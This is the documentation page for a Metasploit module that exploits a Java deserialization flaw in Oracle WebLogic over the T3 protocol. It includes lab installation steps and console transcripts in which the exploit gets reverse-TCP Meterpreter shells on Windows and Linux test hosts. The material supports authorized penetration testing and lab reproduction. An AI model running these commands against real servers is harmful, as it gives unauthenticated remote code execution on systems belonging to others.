4.1 KiB
Vulnerable Application
There exists a Java object deserialization vulnerability in multiple versions of WebLogic.
Unauthenticated remote code execution can be achieved
by sending a serialized BadAttributeValueExpException object
over the T3 protocol to vulnerable WebLogic servers.
This module has been tested against versions v12.1.3.0.0,
v12.2.1.3.0, and v12.2.1.4.0.
WebLogic versions can be downloaded from here.
Installation
Some version of Java 8 JDK is required to be installed on the server. This module has been tested successfully using jdk8u202 and jdk8u251.
Installation instructions for WebLogic can be found here.
On step 10 of the installation instructions, keep the
Run Quickstart box checked and click done. A new window
should pop up. Select Create a new domain -> next.
Ensure Basic WebLogic Server Domain is selected and click next.
Create credentials and select next. Domain mode can be either
Production or Development, then click next. Click next again
and select Create. Click next a couple more times, then click
finish.
To start WebLogic, execute the startWebLogic script in
Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/.
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/misc/weblogic_deserialize_badattrval - Do:
set RHOSTS <ip> - Do:
run - You should get a meterpreter session.
Scenarios
WebLogic v12.2.1.4 on Windows 10
msf5 > use exploit/multi/misc/weblogic_deserialize_badattrval
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185
rhosts => 172.16.215.185
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run
[*] Started reverse TCP handler on 172.16.215.1:4444
[*] 172.16.215.185:7001 - WebLogic version detected: 12.2.1.4.0
[*] 172.16.215.185:7001 - Sending handshake...
[*] 172.16.215.185:7001 - Formatting payload...
[*] 172.16.215.185:7001 - Sending object...
[*] Sending stage (176195 bytes) to 172.16.215.185
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.185:50795) at 2020-05-15 09:37:45 -0500
meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer : DESKTOP-AQT4EG1
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x86/windows
WebLogic v12.1.3.0.0 on Ubuntu 18.04 Linux
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1
target => 1
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196
rhosts => 172.16.215.196
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run
[*] Started reverse TCP handler on 172.16.215.1:4444
[*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0
[*] 172.16.215.196:7001 - Sending handshake...
[*] 172.16.215.196:7001 - Formatting payload...
[*] 172.16.215.196:7001 - Sending object...
[*] Sending stage (3012516 bytes) to 172.16.215.196
[*] Meterpreter session 6 opened (172.16.215.1:4444 -> 172.16.215.196:60672) at 2020-05-15 09:41:17 -0500
[*] 172.16.215.196:7001 - Command Stager progress - 101.36% done (820/809 bytes)
meterpreter > getuid
Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer : 172.16.215.196
OS : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux